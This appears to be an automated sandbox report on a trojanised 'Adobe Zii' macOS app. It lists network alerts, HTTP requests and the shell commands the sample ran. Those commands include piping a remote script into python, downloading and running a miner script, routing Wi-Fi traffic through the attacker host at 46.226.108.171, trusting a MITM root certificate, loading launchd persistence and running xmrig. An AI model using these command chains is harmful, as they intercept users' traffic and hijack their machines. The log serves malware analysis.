Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 46.226.108.171 |
Source: global traffic | HTTP traffic detected: GET /sample.zip HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */* |
Source: global traffic | HTTP traffic detected: GET /login/process.php HTTP/1.1Accept-Encoding: identityHost: 46.226.108.171:4444Cookie: session=Uy3r/62UwT8t7hOk1wN8uCOC4Vk=Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
Source: global traffic | HTTP traffic detected: GET /news.php HTTP/1.1Accept-Encoding: identityHost: 46.226.108.171:4444Cookie: session=FG19agq3LNl5N2MHdDr0MRKAZ24=Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
Source: global traffic | HTTP traffic detected: GET /uploadminer.sh HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */* |
Source: global traffic | HTTP traffic detected: GET /com.apple.rig.plist HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */* |
Source: global traffic | HTTP traffic detected: GET /com.apple.rig.plist HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */* |
Source: global traffic | HTTP traffic detected: GET /com.proxy.initialize.plist HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */* |
Source: global traffic | HTTP traffic detected: GET /config.json HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */* |
Source: global traffic | HTTP traffic detected: GET /xmrig HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */* |
Source: global traffic | HTTP traffic detected: GET /news.php HTTP/1.1Accept-Encoding: identityHost: 46.226.108.171:4444Cookie: session=SYDFioywtcFbUR5U3EST96SbqVk=Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
Source: global traffic | HTTP traffic detected: GET /admin/get.php HTTP/1.1Accept-Encoding: identityHost: 46.226.108.171:4444Cookie: session=hbR4wlsbQec60C56VlkryZf6BKM=Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
Source: global traffic | HTTP traffic detected: GET /uploadminer.sh HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */* |
Source: global traffic | HTTP traffic detected: GET /com.apple.rig.plist HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */* |
Source: global traffic | HTTP traffic detected: GET /com.proxy.initialize.plist HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */* |
Source: global traffic | HTTP traffic detected: GET /config.json HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */* |
Source: global traffic | HTTP traffic detected: GET /xmrig HTTP/1.1Host: 46.226.108.171User-Agent: curl/7.54.0Accept: */* |
Source: /bin/sh (PID: 554) | Shell process: ps -ef | Jump to behavior |
Source: /bin/sh (PID: 555) | Shell process: grep Little Snitch | Jump to behavior |
Source: /bin/sh (PID: 556) | Shell process: grep -v grep | Jump to behavior |
Source: /bin/sh (PID: 557) | Shell process: id -u | Jump to behavior |
Source: /bin/sh (PID: 558) | Shell process: ps 550 | Jump to behavior |
Source: /bin/sh (PID: 560) | Shell process: curl -o uploadminer.sh http://46.226.108.171/uploadminer.sh | Jump to behavior |
Source: /bin/sh (PID: 561) | Shell process: chmod +x ./uploadminer.sh | Jump to behavior |
Source: /bin/sh (PID: 563) | Shell process: osascript -e do shell script 'networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem' with administrator privileges | Jump to behavior |
Source: /bin/sh (PID: 567) | Shell process: networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 | Jump to behavior |
Source: /bin/sh (PID: 568) | Shell process: /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old | Jump to behavior |
Source: /bin/sh (PID: 569) | Shell process: networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 | Jump to behavior |
Source: /bin/sh (PID: 570) | Shell process: /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old | Jump to behavior |
Source: /bin/sh (PID: 571) | Shell process: curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem | Jump to behavior |
Source: /bin/sh (PID: 574) | Shell process: curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist | Jump to behavior |
Source: /bin/sh (PID: 575) | Shell process: curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist | Jump to behavior |
Source: /bin/sh (PID: 576) | Shell process: launchctl load -w com.apple.rig.plist | Jump to behavior |
Source: /bin/sh (PID: 578) | Shell process: launchctl load -w com.proxy.initialize.plist | Jump to behavior |
Source: /bin/sh (PID: 580) | Shell process: curl -o config.json http://46.226.108.171/config.json | Jump to behavior |
Source: /bin/sh (PID: 581) | Shell process: curl -o xmrig http://46.226.108.171/xmrig | Jump to behavior |
Source: /bin/sh (PID: 589) | Shell process: chmod +x ./xmrig | Jump to behavior |
Source: /bin/sh (PID: 590) | Shell process: rm -rf ./xmrig2 | Jump to behavior |
Source: /bin/sh (PID: 591) | Shell process: rm -rf ./config2.json | Jump to behavior |
Source: /bin/sh (PID: 593) | Shell process: ./xmrig -c config.json | Jump to behavior |
Source: /bin/sh (PID: 583) | Shell process: ps -ef | Jump to behavior |
Source: /bin/sh (PID: 584) | Shell process: grep Little Snitch | Jump to behavior |
Source: /bin/sh (PID: 585) | Shell process: grep -v grep | Jump to behavior |
Source: /bin/sh (PID: 587) | Shell process: id -u | Jump to behavior |
Source: /bin/sh (PID: 588) | Shell process: ps 579 | Jump to behavior |
Source: /bin/sh (PID: 596) | Shell process: curl -o uploadminer.sh http://46.226.108.171/uploadminer.sh | Jump to behavior |
Source: /bin/sh (PID: 597) | Shell process: chmod +x ./uploadminer.sh | Jump to behavior |
Source: /bin/sh (PID: 599) | Shell process: osascript -e do shell script 'networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem' with administrator privileges | Jump to behavior |
Source: /bin/sh (PID: 603) | Shell process: networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 | Jump to behavior |
Source: /bin/sh (PID: 604) | Shell process: /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old | Jump to behavior |
Source: /bin/sh (PID: 605) | Shell process: networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 | Jump to behavior |
Source: /bin/sh (PID: 606) | Shell process: /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old | Jump to behavior |
Source: /bin/sh (PID: 607) | Shell process: curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem | Jump to behavior |
Source: /bin/sh (PID: 608) | Shell process: curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist | Jump to behavior |
Source: /bin/sh (PID: 609) | Shell process: curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist | Jump to behavior |
Source: /bin/sh (PID: 610) | Shell process: launchctl load -w com.apple.rig.plist | Jump to behavior |
Source: /bin/sh (PID: 611) | Shell process: launchctl load -w com.proxy.initialize.plist | Jump to behavior |
Source: /bin/sh (PID: 612) | Shell process: curl -o config.json http://46.226.108.171/config.json | Jump to behavior |
Source: /bin/sh (PID: 613) | Shell process: curl -o xmrig http://46.226.108.171/xmrig | Jump to behavior |
Source: /bin/sh (PID: 614) | Shell process: chmod +x ./xmrig | Jump to behavior |
Source: /bin/sh (PID: 615) | Shell process: rm -rf ./xmrig2 | Jump to behavior |
Source: /bin/sh (PID: 616) | Shell process: rm -rf ./config2.json | Jump to behavior |
Source: /bin/sh (PID: 617) | Shell process: ./xmrig -c config.json | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written 64-bit Mach-O /Users/henry/sample/sample.app/Contents/MacOS/Adobe Zii: bits: - usr: rx grp: rx all: rwx | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/Resources/libConfigurer.dylib: bits: - usr: rx grp: rx all: rwx | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/amtlib: bits: - usr: rx grp: rx all: rwx | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/Resources/libConfigurer.dylib: bits: - usr: rx grp: rx all: rwx | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/amtlib: bits: - usr: rx grp: rx all: rwx | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/Resources/libConfigurer.dylib: bits: - usr: rx grp: rx all: rwx | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/amtlib: bits: - usr: rx grp: rx all: rwx | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written 64-bit Mach-O /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/Resources/libConfigurer.dylib: bits: - usr: rx grp: rx all: rwx | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/amtlib: bits: - usr: rx grp: rx all: rwx | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | Permissions modified for written FAT Mach-O /Users/henry/sample/sample.app/Contents/Resources/v6.bundle/Versions/A/amtlib: bits: - usr: rx grp: rx all: rwx | Jump to dropped file |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/MacOS/._Adobe Zii | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/._MacOS | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._AdobeIcon.png | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/._Resources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/._CodeResources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/_CodeSignature/._CodeResources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/.__CodeSignature | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/Resources/._libConfigurer.dylib | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/Resources/._Info.plist | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/._Resources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/A/._amtlib | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/._A | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/Versions/._Current | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/._Versions | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9.bundle/._amtlib | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._v9.bundle | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._AppIcon.icns | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/Base.lproj/._MainMenu.nib | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._Base.lproj | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/._Resources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/_CodeSignature/._CodeResources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/.__CodeSignature | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/Resources/._libConfigurer.dylib | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/Resources/._Info.plist | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/._Resources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/A/._amtlib | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/._A | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/Versions/._Current | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/._Versions | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v9ME.bundle/._amtlib | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._v9ME.bundle | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/._Resources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/_CodeSignature/._CodeResources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/.__CodeSignature | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/Resources/._libConfigurer.dylib | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/Resources/._Info.plist | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/._Resources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/._amtlib | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/._A | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/._Current | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/._Versions | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/._amtlib | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._v10.bundle | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/._Resources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/_CodeSignature/._CodeResources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/.__CodeSignature | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/Resources/._libConfigurer.dylib | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/Resources/._Info.plist | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/._Resources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/._amtlib | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/._A | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/._Current | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/._Versions | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/._amtlib | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._v10ME.bundle | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/._Resources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/._CodeResources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/_CodeSignature/._CodeResources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/.__CodeSignature | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/Resources/._Info.plist | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/._Resources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/._amtlib | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/._A | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/._Current | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/._Versions | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/._amtlib | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._v6.bundle | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/._Resources | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/._Info.plist | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/Contents/._PkgInfo | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/sample.app/._Contents | Jump to behavior |
Source: /usr/bin/unzip (PID: 592) | Hidden file created: sample/__MACOSX/._sample.app | Jump to behavior |
Source: /Users/henry/Desktop/unpack/Adobe Zii.app/Contents/MacOS/Application Stub (PID: 546) | Shell command executed: /bin/bash -c curl https://ptpb.pw/jj9a | python - & s=46.226.108.171:80 curl $s/sample.zip -o sample.zip unzip sample.zip -d sample cd sample cd __MACOSX open -a sample.app - | Jump to behavior |
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550) | Shell command executed: sh -c id -u | Jump to behavior |
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 553) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep | Jump to behavior |
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 558) | Shell command executed: /bin/sh -c ps 550 | Jump to behavior |
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 559) | Shell command executed: /bin/sh -c cd /tmp && curl -o uploadminer.sh http://46.226.108.171/uploadminer.sh && chmod +x ./uploadminer.sh && ./uploadminer.sh | Jump to behavior |
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 566) | Shell command executed: /bin/sh -c networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem | Jump to behavior |
Source: /usr/sbin/networksetup (PID: 567) | Shell command executed: sh -c /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old | Jump to behavior |
Source: /usr/sbin/networksetup (PID: 569) | Shell command executed: sh -c /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579) | Shell command executed: sh -c id -u | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 582) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 588) | Shell command executed: /bin/sh -c ps 579 | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 595) | Shell command executed: /bin/sh -c cd /tmp && curl -o uploadminer.sh http://46.226.108.171/uploadminer.sh && chmod +x ./uploadminer.sh && ./uploadminer.sh | Jump to behavior |
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 602) | Shell command executed: /bin/sh -c networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem | Jump to behavior |
Source: /usr/sbin/networksetup (PID: 603) | Shell command executed: sh -c /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old | Jump to behavior |
Source: /usr/sbin/networksetup (PID: 605) | Shell command executed: sh -c /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.old | Jump to behavior |
Source: /bin/bash (PID: 549) | Curl executable: /usr/bin/curl -> curl https://ptpb.pw/jj9a | Jump to behavior |
Source: /bin/sh (PID: 560) | Curl executable: /usr/bin/curl -> curl -o uploadminer.sh http://46.226.108.171/uploadminer.sh | Jump to behavior |
Source: /bin/sh (PID: 571) | Curl executable: /usr/bin/curl -> curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem | Jump to behavior |
Source: /bin/sh (PID: 574) | Curl executable: /usr/bin/curl -> curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist | Jump to behavior |
Source: /bin/sh (PID: 575) | Curl executable: /usr/bin/curl -> curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist | Jump to behavior |
Source: /bin/sh (PID: 580) | Curl executable: /usr/bin/curl -> curl -o config.json http://46.226.108.171/config.json | Jump to behavior |
Source: /bin/sh (PID: 581) | Curl executable: /usr/bin/curl -> curl -o xmrig http://46.226.108.171/xmrig | Jump to behavior |
